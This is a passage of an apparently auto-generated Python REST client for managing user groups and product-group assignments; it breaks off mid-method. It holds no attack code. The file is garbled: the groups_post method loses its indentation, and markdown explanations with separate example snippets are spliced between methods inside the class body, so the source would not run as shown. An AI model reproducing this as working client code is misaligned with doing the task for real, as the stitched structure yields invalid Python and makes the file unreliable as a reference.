        Unassigns a list of users from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign users from a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_delete(api_token, group, unassing_users_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param UnassingUsersGroupRequestBody unassing_users_group_request_body: JSON object that contains information to unassign users from the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, **kwargs)  # noqa: E501
            return data

    def groups_group_users_delete_with_http_info(self, api_token, group, unassing_users_group_request_body, **kwargs):  # noqa: E501
        """Unassigns a list of users from a group  # noqa: E501

        Unassigns a list of users from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign users from a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param UnassingUsersGroupRequestBody unassing_users_group_request_body: JSON object that contains information to unassign users from the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group', 'unassing_users_group_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_users_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_delete`")  # noqa: E501
        # verify the required parameter 'group' is set
        if ('group' not in params or
                params['group'] is None):
            raise ValueError("Missing the required parameter `group` when calling `groups_group_users_delete`")  # noqa: E501
        # verify the required parameter 'unassing_users_group_request_body' is set
        if ('unassing_users_group_request_body' not in params or
                params['unassing_users_group_request_body'] is None):
            raise ValueError("Missing the required parameter `unassing_users_group_request_body` when calling `groups_group_users_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group' in params:
            path_params['group'] = params['group']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'unassing_users_group_request_body' in params:
            body_params = params['unassing_users_group_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{group}/users', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_users_get(self, api_token, group, **kwargs):  # noqa: E501
        """Lists the users of a group  # noqa: E501

        Lists the users who belong to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to list users of a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_get(api_token, group, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :return: list[User]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_users_get_with_http_info(api_token, group, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_users_get_with_http_info(api_token, group, **kwargs)  # noqa: E501
            return data

    def groups_group_users_get_with_http_info(self, api_token, group, **kwargs):  # noqa: E501
        """Lists the users of a group  # noqa: E501

        Lists the users who belong to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to list users of a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_get_with_http_info(api_token, group, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :return: list[User]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_users_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_get`")  # noqa: E501
        # verify the required parameter 'group' is set
        if ('group' not in params or
                params['group'] is None):
            raise ValueError("Missing the required parameter `group` when calling `groups_group_users_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group' in params:
            path_params['group'] = params['group']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{group}/users', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[User]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_users_put(self, api_token, group, assign_user_group_request_body, **kwargs):  # noqa: E501
        """Assigns users to a group  # noqa: E501

        Assigns users to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to assign users to a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_put(api_token, group, assign_user_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param AssignUserGroupRequestBody assign_user_group_request_body: JSON object that contains information to assign users to the group (required)
        :return: InlineResponse201
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, **kwargs)  # noqa: E501
            return data

    def groups_group_users_put_with_http_info(self, api_token, group, assign_user_group_request_body, **kwargs):  # noqa: E501
        """Assigns users to a group  # noqa: E501

        Assigns users to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to assign users to a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param AssignUserGroupRequestBody assign_user_group_request_body: JSON object that contains information to assign users to the group (required)
        :return: InlineResponse201
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group', 'assign_user_group_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_users_put" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_put`")  # noqa: E501
        # verify the required parameter 'group' is set
        if ('group' not in params or
                params['group'] is None):
            raise ValueError("Missing the required parameter `group` when calling `groups_group_users_put`")  # noqa: E501
        # verify the required parameter 'assign_user_group_request_body' is set
        if ('assign_user_group_request_body' not in params or
                params['assign_user_group_request_body'] is None):
            raise ValueError("Missing the required parameter `assign_user_group_request_body` when calling `groups_group_users_put`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group' in params:
            path_params['group'] = params['group']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'assign_user_group_request_body' in params:
            body_params = params['assign_user_group_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{group}/users', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='InlineResponse201',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def groups_group_users_user_delete(self, api_token, group, user, **kwargs):  # noqa: E501
        """Removes a user from a group  # noqa: E501

        Unassigns a user from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign a user from a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_user_delete(api_token, group, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param str user: user to be removed from the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.groups_group_users_user_delete_with_http_info(api_token, group, user, **kwargs)  # noqa: E501
        else:
            (data) = self.groups_group_users_user_delete_with_http_info(api_token, group, user, **kwargs)  # noqa: E501
            return data

    def groups_group_users_user_delete_with_http_info(self, api_token, group, user, **kwargs):  # noqa: E501
        """Removes a user from a group  # noqa: E501

        Unassigns a user from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign a user from a group, **if you belong to this group**.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.groups_group_users_user_delete_with_http_info(api_token, group, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_token: Authentication token (required)
        :param str group: name of the group (required)
        :param str user: user to be removed from the group (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'group', 'user']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_group_users_user_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_user_delete`")  # noqa: E501
        # verify the required parameter 'group' is set
        if ('group' not in params or
                params['group'] is None):
            raise ValueError("Missing the required parameter `group` when calling `groups_group_users_user_delete`")  # noqa: E501
        # verify the required parameter 'user' is set
        if ('user' not in params or
                params['user'] is None):
            raise ValueError("Missing the required parameter `user` when calling `groups_group_users_user_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'group' in params:
            path_params['group'] = params['group']  # noqa: E501
        if 'user' in params:
            path_params['user'] = params['user']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups/{group}/users/{user}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def groups_post(self, api_token, create_group_request_body, **kwargs): # noqa: E501
"""Creates a new user group # noqa: E501
Creates a new user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_post(api_token, create_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param CreateGroupRequestBody create_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_post_with_http_info(api_token, create_group_request_body, **kwargs) # noqa: E501
else:
(data) = self.groups_post_with_http_info(api_token, create_group_request_body, **kwargs) # noqa: E501
return data
def groups_post_with_http_info(self, api_token, create_group_request_body, **kwargs): # noqa: E501
"""Creates a new user group # noqa: E501
Creates a new user group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_post_with_http_info(api_token, create_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param CreateGroupRequestBody create_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
        all_params = ['api_token', 'create_group_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method groups_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `groups_post`")  # noqa: E501
        # verify the required parameter 'create_group_request_body' is set
        if ('create_group_request_body' not in params or
                params['create_group_request_body'] is None):
            raise ValueError("Missing the required parameter `create_group_request_body` when calling `groups_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'create_group_request_body' in params:
            body_params = params['create_group_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/groups', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Group',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
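Every `*_with_http_info` method in this module starts by validating `**kwargs` against an allow-list before any HTTP work happens. A minimal, self-contained sketch of that pattern (the helper name `_check_kwargs` is illustrative, not part of the generated client):

```python
def _check_kwargs(method_name, allowed, kwargs):
    # Mirror the generated loop: any keyword not in the allow-list
    # raises TypeError with the same message shape.
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )

# Known keywords pass through silently.
_check_kwargs('groups_post', ['async_req', '_request_timeout'],
              {'async_req': True})

# Unknown keywords fail fast, before any request is built.
try:
    _check_kwargs('groups_post', ['async_req'], {'timeout': 5})
except TypeError as exc:
    message = str(exc)
```

Failing early here means a typo like `timeout` (instead of `_request_timeout`) surfaces as a `TypeError` rather than being silently ignored.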

    def products_ref_groups_delete(self, api_token, ref, unassign_groups_product_request_body, **kwargs):  # noqa: E501
        """Unassigns a list of user groups from a product.  # noqa: E501

        Unassigns a list of user groups from a product. Condition to perform the action: the caller must have the **PRODUCT_UPDATE** permission granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_delete(api_token, ref, unassign_groups_product_request_body, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :param UnassignGroupsProductRequestBody unassign_groups_product_request_body: JSON object that contains the groups to unassign from the product (required)
        :return: InlineResponse200
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, **kwargs)  # noqa: E501
        else:
            (data) = self.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, **kwargs)  # noqa: E501
            return data
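The `async_req` convention these wrappers follow can be sketched with a plain thread pool: when `async_req` is truthy the call returns an async handle whose `.get()` yields the same value the synchronous path returns. The names `call` and `fake_request` below are illustrative stand-ins, not the real client:

```python
from multiprocessing.pool import ThreadPool

_pool = ThreadPool(1)

def call(fn, async_req=False, **kwargs):
    # Async path: hand the work to the pool and return the AsyncResult,
    # so the caller can later do thread.get().
    if async_req:
        return _pool.apply_async(fn, kwds=kwargs)
    # Sync path: run inline and return the data directly.
    return fn(**kwargs)

def fake_request(ref=None):
    # Stand-in for an HTTP call; returns a canned payload.
    return {'ref': ref, 'groups': []}

sync_data = call(fake_request, ref='p-1')
thread = call(fake_request, async_req=True, ref='p-1')
async_data = thread.get()  # blocks until the pooled call completes
```

This is why the docstrings say "returns the request thread" for the asynchronous case: the caller must explicitly `.get()` the result.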

    def products_ref_groups_delete_with_http_info(self, api_token, ref, unassign_groups_product_request_body, **kwargs):  # noqa: E501
        """Unassigns a list of user groups from a product.  # noqa: E501

        Unassigns a list of user groups from a product. Condition to perform the action: the caller must have the **PRODUCT_UPDATE** permission granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_delete_with_http_info(api_token, ref, unassign_groups_product_request_body, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :param UnassignGroupsProductRequestBody unassign_groups_product_request_body: JSON object that contains the groups to unassign from the product (required)
        :return: InlineResponse200
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'ref', 'unassign_groups_product_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method products_ref_groups_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_delete`")  # noqa: E501
        # verify the required parameter 'ref' is set
        if ('ref' not in params or
                params['ref'] is None):
            raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_delete`")  # noqa: E501
        # verify the required parameter 'unassign_groups_product_request_body' is set
        if ('unassign_groups_product_request_body' not in params or
                params['unassign_groups_product_request_body'] is None):
            raise ValueError("Missing the required parameter `unassign_groups_product_request_body` when calling `products_ref_groups_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'ref' in params:
            path_params['ref'] = params['ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'unassign_groups_product_request_body' in params:
            body_params = params['unassign_groups_product_request_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/products/{ref}/groups', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='InlineResponse200',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
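After the kwargs allow-list check, each method verifies that every required parameter is present and not `None`. A compact, self-contained sketch of that check (the helper name `_require` is illustrative, not part of the generated client):

```python
def _require(params, name, method):
    # Same check as the generated code: a missing key and an
    # explicitly-None value both raise ValueError.
    if name not in params or params[name] is None:
        raise ValueError(
            "Missing the required parameter `%s` when calling `%s`"
            % (name, method))

# A present, non-None parameter passes silently.
_require({'ref': 'p-1'}, 'ref', 'products_ref_groups_delete')

# Passing ref=None is treated the same as omitting it entirely.
try:
    _require({'ref': None}, 'ref', 'products_ref_groups_delete')
except ValueError as exc:
    error_text = str(exc)
```

Note the `or` in the condition: callers cannot bypass the check by explicitly supplying `None`.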

    def products_ref_groups_get(self, api_token, ref, **kwargs):  # noqa: E501
        """List all groups assigned to a product  # noqa: E501

        List all groups assigned to a product. Conditions to perform the action: a caller with the PRODUCTS_LIST_ALL permission can query any product without restriction; without that permission, the call only returns the groups if the caller belongs to that product.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_get(api_token, ref, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.products_ref_groups_get_with_http_info(api_token, ref, **kwargs)  # noqa: E501
        else:
            (data) = self.products_ref_groups_get_with_http_info(api_token, ref, **kwargs)  # noqa: E501
            return data

    def products_ref_groups_get_with_http_info(self, api_token, ref, **kwargs):  # noqa: E501
        """List all groups assigned to a product  # noqa: E501

        List all groups assigned to a product. Conditions to perform the action: a caller with the PRODUCTS_LIST_ALL permission can query any product without restriction; without that permission, the call only returns the groups if the caller belongs to that product.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_get_with_http_info(api_token, ref, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'ref']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method products_ref_groups_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_get`")  # noqa: E501
        # verify the required parameter 'ref' is set
        if ('ref' not in params or
                params['ref'] is None):
            raise ValueError("Missing the required parameter `ref` when calling `products_ref_groups_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'ref' in params:
            path_params['ref'] = params['ref']  # noqa: E501

        query_params = []

        header_params = {}
        if 'api_token' in params:
            header_params['api-token'] = params['api_token']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/products/{ref}/groups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
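The `{ref}` placeholder in the `'/products/{ref}/groups'` template is filled from `path_params` by the api_client before the request is sent. A stdlib-only sketch of that substitution (the real client routes through `six` and its own serialization; `build_path` here is a hypothetical helper using `urllib.parse` directly):

```python
from urllib.parse import quote

def build_path(template, path_params):
    # Substitute each {name} placeholder with its URL-escaped value,
    # so characters like spaces and slashes cannot corrupt the route.
    path = template
    for name, value in path_params.items():
        path = path.replace('{%s}' % name, quote(str(value), safe=''))
    return path

resource_path = build_path('/products/{ref}/groups', {'ref': 'my product/1'})
# -> '/products/my%20product%2F1/groups'
```

Escaping with `safe=''` matters: a `ref` containing `/` would otherwise be interpreted as an extra path segment by the server.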

    def products_ref_groups_put(self, api_token, ref, assign_groups_product_request_body, **kwargs):  # noqa: E501
        """Assigns groups of users to a product.  # noqa: E501

        Assigns groups of users to a product. Condition to perform the action: the caller must have the **PRODUCT_UPDATE** permission granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_put(api_token, ref, assign_groups_product_request_body, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :param AssignGroupsProductRequestBody assign_groups_product_request_body: JSON object that contains the groups to assign to the product (required)
        :return: ProductShortGroups
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, **kwargs)  # noqa: E501
        else:
            (data) = self.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, **kwargs)  # noqa: E501
            return data

    def products_ref_groups_put_with_http_info(self, api_token, ref, assign_groups_product_request_body, **kwargs):  # noqa: E501
        """Assigns groups of users to a product.  # noqa: E501

        Assigns groups of users to a product. Condition to perform the action: the caller must have the **PRODUCT_UPDATE** permission granted.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.products_ref_groups_put_with_http_info(api_token, ref, assign_groups_product_request_body, async_req=True)
        >>> result = thread.get()

        :param bool async_req: execute the request asynchronously
        :param str api_token: Authentication token (required)
        :param str ref: Product reference (required)
        :param AssignGroupsProductRequestBody assign_groups_product_request_body: JSON object that contains the groups to assign to the product (required)
        :return: ProductShortGroups
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['api_token', 'ref', 'assign_groups_product_request_body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method products_ref_groups_put" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_token' is set
        if ('api_token' not in params or
                params['api_token'] is None):
            raise ValueError("Missing the required parameter `api_token` when calling `products_ref_groups_put`")  # noqa: E501
        # verify the required parameter 'ref' is set
        if ('ref' not in params or
